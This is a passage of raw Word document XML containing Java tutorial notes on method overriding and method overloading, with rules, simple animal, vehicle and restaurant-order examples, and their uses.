          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Static methods are bound at compile time, so they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redeclared</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but not overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A2417"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725DA">
          <v:rect id="_x0000_i1350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0927801E"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B6AB8B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 </w:t>
      </w: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xml:space="preserve"> as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as subclasses. Both have a method start(), but the behavior of start() is different for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E338E"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General method — start() might just say, "Starting vehicle."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654CA2F4"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Overrides the start() method — "Starting car with ignition."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481458B6"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Overrides the start() method — "Starting bike with kick."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C1170" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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ven though each vehicle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start() method, each subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overrides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it to suit its own behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44572720" w14:textId="7FC4032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3AD7090">
          <v:rect id="_x0000_i1351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D435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2" w:name="_Toc197867336"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to achieve method overriding?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="42BAA6C4" w14:textId="1E21CAA2" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565E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hieve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n Java, you need to follow these key steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C8F96"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 the Parent Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The subclass must extend the parent class to inherit its methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D33ED"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Parent Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In the subclass, redefine the inherited method using the </w:t>
      </w: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as in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FDDB0C"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Although optional, it is a good practice to use the @Override annotation to ensure you're overriding a method correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B265E48" w14:textId="77777777" w:rsidR="00D86C8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D86C8F" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC92DEF" w14:textId="68157B41"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s for Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3E3BF"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Parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74D986"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ubclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that extends the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C9B9ED"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method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEA78A"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subclass</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to call the overridden method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E4F4C"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513495">
          <v:rect id="_x0000_i1352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454DB52"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chieving Method Overriding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EA1EC"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arent Class (Superclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46990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78686CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DA387"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61174FED"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566227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D51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931F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hild Class (Subclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E9E2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6D54A2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0F8B99A9"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929E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8E2A6A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7A1FB3C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096B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E3820A" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3000880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at extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E8E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6F5A629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85B5F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9A1AC1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6A543B4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73313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32FE31"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esting Method Overriding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E6C0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893144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7E739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objects of subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77252DD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685C5DC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3A85AE6C" w14:textId="77777777" w:rsidR="00DC43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC43FA" w:rsidP="00565ED6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358141F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overridden method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACDA88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7EC73B8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C4386E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9A41AE"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D65ED2"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5B1EB5">
          <v:rect id="_x0000_i1353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00005105"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2730DF2C"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in the subclass must have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ame return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ame parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE50DD"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This is a compiler-time check to ensure you're correctly overriding the method. If you don’t match the method signature, the compiler will give an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0E031"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The subclass must inherit from the parent class. The method in the parent class should not be final, static, or private as those methods cannot be overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC56A39"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thod overriding is associated with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aning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etermines which method to invoke (in the example, it’s determined at runtime whether the Dog or Cat method is invoked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F891646"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B5D2C7">
          <v:rect id="_x0000_i1354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928682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Method Overriding is Useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E306927"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ization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overriding allows a subclass to customize the behavior of a method that it inherits from the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EAD7E"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It supports polymorphic behavior, allowing you to treat objects of different classes (that share a common superclass) in a similar manner while still calling their specific methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992C10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the above case, we can treat both Dog and Cat as Animal types but still call the overridden methods specific to each class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54FB63" w14:textId="1ACF6AEE"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72F289">
          <v:rect id="_x0000_i1355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DEE5C" w14:textId="77777777" w:rsidR="00530FA9" w:rsidRPr="00CE4B95" w:rsidRDefault="00530FA9" w:rsidP="00530FA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc197867337"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is method overloading?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="10D32E89" w14:textId="51818E81" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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is a concept in Java where a class has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with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ifferent parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either in number or type). 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can be the same or different, but the method signature must differ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD07A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allows a class to define multiple methods that perform similar tasks but with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B48E4"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C5CE82">
          <v:rect id="_x0000_i1356" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F827A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Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B15D675"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in the same class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD12776"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parameter lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in number, type, or both).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3B581"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return types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (but this is not enough by itself to overload methods).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6F553"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access modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., public, private).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE345D"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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at compile time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, hence known a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515BAB00"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03840">
          <v:rect id="_x0000_i1357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC0953"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Method Overloading Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE855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method with the same name, the Java compiler decides which method to invoke based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340DA8A1"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number of parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AFC7D"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type of parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84EC4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doesn’t play a role in method overloading resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969215A"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AE617">
          <v:rect id="_x0000_i1358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0131776E"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Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF627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6326A13" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571C01DD"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integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880668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20E9604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41FF9A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B89444" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491CDB6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hree integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AE5E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69F37C3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3CF0BF4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E66E83" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752A9D7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doubles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE88EA9"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AB5E9E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FDAE3CF"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627270"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CFE71" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354A010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3164A6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320C1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007B08A" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520C8F9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46ECD46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069CDFF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4B47CB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071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14360D"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36A80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27C5A29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63FC12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8585B03"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9B6FB">
          <v:rect id="_x0000_i1359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A85FE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ethod Overloading Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673E447"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The method signature consists of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07095CF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is not part of the method signature and cannot be used to differentiate overloaded methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3F9200"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Overloaded methods must have different parameter types, number of parameters, or both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0B48F"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double, double) are overloaded because they take different types of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABB26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int, int, int) are overloaded because they take a different number of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE72AAD"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1D7E9E">
          <v:rect id="_x0000_i1360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CF6D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is Method Overloading Useful?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0876F865"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 Overloading makes your code easier to read and understand by allowing you to use the same method name for similar actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723DD15"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ultiple add methods for adding different numbers of parameters or different types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E556C8"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Different Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows you to perform the same operation on different types of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3EFC91"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 multiply method can be overloaded for both integers and floating-point numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C0C35"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F5F85">
          <v:rect id="_x0000_i1361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D3CAC"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3DAD7038"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xml:space="preserve">: Overloading depends on the difference in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>numb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parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6F719"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t Based on Return Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You cannot overload methods based only on the return type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332635C"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Overloading is resolved at compile-time, so it doesn’t incur runtime overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A7BC3"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Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The overloaded methods must be in the same class or inherited from a superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AE2A6"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504F47">
          <v:rect id="_x0000_i1362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5C8F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Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C146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ordering food at a restaurant. You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order a drink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146CD38"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1 parameter: size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B9A1D"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rge drink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1 parameter: size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9409EC"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 with ice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
